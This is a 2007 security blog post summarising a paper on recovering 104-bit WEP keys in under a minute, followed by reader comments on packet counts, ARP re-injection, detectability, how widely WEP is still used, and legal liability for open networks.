Breaking WEP in Under a Minute

WEP (Wired Equivalent Privacy) was the protocol used to secure wireless networks. It's known to be insecure and has been replaced by Wi-Fi Protected Access, but it's still in use.

This paper, "Breaking 104 bit WEP in less than 60 seconds," is the best attack against WEP to date:

Abstract:

We demonstrate an active attack on the WEP protocol that is able to recover a 104-bit WEP key using less than 40.000 frames with a success probability of 50%. In order to succeed in 95% of all cases, 85.000 packets are needed. The IV of these packets can be randomly chosen. This is an improvement in the number of required frames by more than an order of magnitude over the best known key-recovery attacks for WEP. On a IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute. The required computational effort is approximately 2^20 RC4 key setups, which on current desktop and laptop CPUs in negligible.

Posted on April 4, 2007 at 12:46 PM • 27 Comments

Comments

MyCatApril 4, 2007 1:05 PM

"The required computational effort is approximately 220 RC4 key setups"

That's 2 to the 20th power in the paper. While a million is still a very small number of key setups, it's still a lot more than 220.

DavidApril 4, 2007 1:13 PM

I have problems with them saying that it would take a minute. The specific issue I have is gathering the 85,000 packets (to assure a crack at 90+%).

Unless you are forcing replies from the source, you can't sniff 80,000 packets in a minute. Heck, I can't get 85,000 packets from a 100 mbps connection without forcing replies.

We've seen wireless connections that are active all day (being used) with less than 80,000 packets.

The cracking of the key can probably be done in less than a minute, but getting the data can't be done that easily.

JosquinApril 4, 2007 1:19 PM

"On a IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute."

There is how you get the appropriate number of frames.

AaronApril 4, 2007 1:28 PM

"On a IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute."

This captures an ARP request packet and repeatedly re-sends it, generating up to 3 new packets to capture. On my system ARP requests are 42 bytes and replies are 60 bytes so you could generate 85000 packets with 8.7MB of data xferred if you get one arp reply packet per arp sent. That'll be more than one second on 802.11g but less than two seconds probably.

AnonymousApril 4, 2007 2:34 PM

Is there any practical software available using this method yet? Is there any planned?

DanApril 4, 2007 3:07 PM

@David:
Its way too easy with the right tools and right wireless card. I don't think I should necessarily mention them here, but they aren't hard to find.

FooDooApril 4, 2007 4:09 PM

There was a talk at Shmoocon '07 re: cracking WEP using sniffed packets and FPGAs (specialized circuit boards).

Anonymous PilotApril 4, 2007 4:52 PM

Remember what Bruce said, be careful in designing a cryptographic system, it will be with use for a long fscking time.

The Anonymous Pilot

DavidApril 4, 2007 5:30 PM

I'm very familiar with forcing traffic and creating traffic, there are a *ton* of tools to do this.

What I was referring to was "passively" sniffing 85,000 frames.

Any time you inject packets something of yours is detectable, possibly the OS, the tool, etc.

If you want to crack it without letting anyone know, you need to do this "passively", and 85,000 packets is a long time when you are doing that.

You guys are like the bank robbers that are blowing up ATMs. Sure you get the money, but you leave a ton of evidence behind..... Not so good, IMHO.

WoodyApril 4, 2007 6:12 PM

@David

If the goal is to crack a home network from the curb, who's going to be monitoring the wireless network for a flood of ARPs?

Even with a corporate network, is an attack of this sort likely to be noticed? Running a spoofed mac id and pounding the network for say 5-10 seconds (to spread it out a bit), is anyone going to notice that host A seemed excessively curious about host B (at the ARP level, not at the IP firewall level?)

ThomasApril 4, 2007 8:24 PM

@David,
"""Any time you inject packets something of yours is detectable, possibly the OS, the tool, etc."""

I doubt that anyone still using WEP is going to be collecting, much less looking at, this sort of stuff.

joseApril 4, 2007 9:58 PM

Well that is and old news but it come vorse to the people just change the system and go up to internet

SamyApril 4, 2007 10:41 PM

Well, just for the record ... I live in Mexico, and it is VERY HARD to find a WPA secured network here ... It is either open, or WEP :-o. Call it paradise ;-)

A.Person from the UKApril 5, 2007 3:18 AM

in the paper they mention that looking at sites around Germany they found many still using WEP. In the UK there are many home networks with no encryption and many that use WEP as its the next choice on the list after none.

WarezApril 5, 2007 4:10 AM

@Anonymous,

Good, when the music police come knocking down my door I'll say it was you ;-)

WarezApril 5, 2007 4:13 AM

http://dir.salon.com/story/tech/feature/2004/05/...

"Dear Comcast,

I am so sorry. I had no idea that copyrighted works were being downloaded via my IP address; I have a wireless router at home and it's possible that someone may have been using my connection at the time. I will do my best to secure this notoriously vulnerable technology, but I can make no guarantee that hackers will not exploit my network in the future."

RickApril 5, 2007 10:07 AM

@Warez

but he lied, he did not "do my best to secure this", he deliberately removed all security. I agree it is a useful letter but, as we now know that any wireless security is at best a delay, he may as well leave it switched on and not lie.

GregApril 5, 2007 11:38 AM

@Rick
The intended letter reads "I *will* do my best to secure this", meaning that he will try and sort the problem out after he was informed of the infringement not that it was already secured.

K. Signal EingangApril 5, 2007 2:44 PM

I use WEP at home and will probably continue to for some time, for several reasons:

First, WEP is enough to keep the casual bandwidth poachers away, and my apartment building alone has at least two completely unsecured networks running, so I doubt anyone's going to make much of an effort to crack mine.

Second, I've got other controls - my wireless network is isolated from my desktop PCs by a firewall, so even if somebody finds my SSID, cracks my WEP key and hops on the network, they're not going to do anything more serious than leech a few kbps of bandwidth.

Finally and most importantly, the Nintendo DS doesn't support WPA. And I gots to have my Mario Kart!

Anony. EuropeApril 6, 2007 12:50 AM

A short but interesting note to those people who take the "better not secure WLAN at all" stand:
in some European countries court decisions have pointed out, that the person owning the access point is responsible for proper security. Neglecting this can result in liability for misuse of the access point, including illegal downloads tracked down by IP, hacking etc.
--> very bad idea not to secure wireless LAN properly, at least in Europe, you might as well shoot your own leg
Happy Easter

AbruzziSeptember 18, 2007 6:21 PM

just simply, i do not see nothing new in that pdf :(, only collected information and putted together...

Leave a comment

Allowed HTML: <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre>

Photo of Bruce Schneier by Per Ervland.

Schneier on Security is a personal website. Opinions expressed are not necessarily those of Co3 Systems, Inc..